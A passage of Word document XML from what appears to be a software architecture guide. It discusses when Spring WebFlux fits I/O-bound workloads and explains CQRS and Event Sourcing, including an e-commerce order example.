        <w:t xml:space="preserve">: WebFlux works best when dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I/O-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations (network calls, database queries). If your microservices are </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, WebFlux might not offer a significant advantage over a traditional Spring MVC approach, as WebFlux is optimized for concurrency and I/O, not CPU-heavy tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3E899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CCE52D">
          <v:rect id="_x0000_i3051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="563157A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3DFD37F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pring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365856A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handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high-concurrency, real-time, or event-driven workloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7600CAF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work with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous and non-blocking I/O operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177723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interact with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive data sources</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508A46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build </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>low-latency and resource-efficient services</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CFF1E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On the other hand, for simple, CPU-bound applications or those with low concurrency, traditional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might be easier and more efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B80E64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ebFlux is a powerful framework that enhances your microservices with the benefits of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making it a perfect fit for high-performance, scalable applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFC0BE6" w14:textId="4131996F"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3052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="230A4C9E" w14:textId="694B1022" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00E25E70">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="725" w:name="_Toc197867939"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>CQRS and Event Sourcing: When and why to use them</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="725"/>
    </w:p>
    <w:p w14:paraId="5F1DF66C" w14:textId="6F087249"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 (Command Query Responsibility Segregatio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B6DB9">
          <v:rect id="_x0000_i3053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE1A9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CQRS (Command Query Responsibility Segregation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E50D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a pattern that separates </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (query) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>commands</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (writes) and one for handling </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (reads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAFFB8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CQRS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6950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Business Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA2AB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 Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B8CE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When your application needs to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scale reads and writes independently</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, CQRS is useful. For example, if you have a system that reads data very frequently but writes less frequently, you can scale the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>query side</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> independently to handle the heavy load of reads while keeping the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>command side</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> more lightweight and focused on writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E907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erformance Optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BFE9A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d-heavy applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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5D6DCF68"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 and Traceability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2AFAD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needs to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>audit</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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CQRS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03484A1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mproved Read/Write Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074F20F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etter Maintainability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB99C7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clearly separating concerns, the system becomes easier to maintain. You can modify how data is read or written without affecting the other side of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4DB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p>
    <w:p w14:paraId="1E42816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ith CQRS, you can scale your system more efficiently. The read model can scale independently of the write model, ensuring that you can handle large volumes of data without degrading performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786BA76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2D0395">
          <v:rect id="_x0000_i3054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="550324B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Event Sourcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A36C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a pattern where the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>state of a system is persisted as a sequence of events</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Event Sourcing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A4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State Transitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CBCAF5"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the state of an entity or system undergoes complex transition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Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137E5C7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is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ing and History:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449E162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is perfect for scenarios where you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>track every change</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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istributed Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5049726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you're building </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or distributed systems, event sourcing can help manage and propagate changes in a distributed manner. Each service can listen to events that affect it, enabling better </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6907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72D1F8A7"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can be useful in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eventually consistent</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems, where consistency between services or components is not immediate but is achieved over time as events are propagated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D186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Event Sourcing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDEEDE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ry and Auditability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5958BA5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Since all changes are stored as events, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replay events</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to reconstruct the state of an entity at any point in time, allowing for full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of changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF0664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Decoupling of Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10909C1F"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Recovery and Replay:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC9C90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 system needs to recover data or undo change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llows you to replay events to get back to any state in the past, which can be helpful in scenarios like system failures or debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A31726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Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD9122"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naturally fits with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, enabling more decoupled and responsive systems where components react to events instead of querying for changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB5B1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F5FDF">
          <v:rect id="_x0000_i3055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24636D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mbining CQRS and Event Sourcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1560FA8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often used together to provide powerful solutions to complex problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4477949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focuses on separating the read and write models to allow for independent optimization and scalability, while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focuses on persisting changes as events rather than storing the current state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8D0BC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combined, </w:t>
      </w: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handles the query and command sides of your system,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stores the changes to state as events, providing a robust, scalable, and auditable system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5009825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17DB4F6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commerce Order System</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381000C"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a large e-commerce platform, an </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> might go through multiple stages (e.g., placed, processed, shipped). Using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each change in the order’s status is saved as an event (OrderPlaced, OrderShipped, etc.), and the state of the order can be rebuilt by replaying those events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EBB4F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can be used to optimize the reading of order data. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>query model</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> may allow the system to perform complex queries on orders (e.g., order status, total revenue), while the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>command model</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will handle order creation, update, or cancellation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A0AB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DACE1">
          <v:rect id="_x0000_i3056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CA2E6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C620A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useful when there’s a need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separate read and write operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to performance or scalability concerns, or when the system has complex business logic or workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6840FEC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useful when </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tracking all state changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is important (e.g., audit logs, recovering past states) or when working with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207A969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patterns are not necessary for every application, but they are invaluable in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
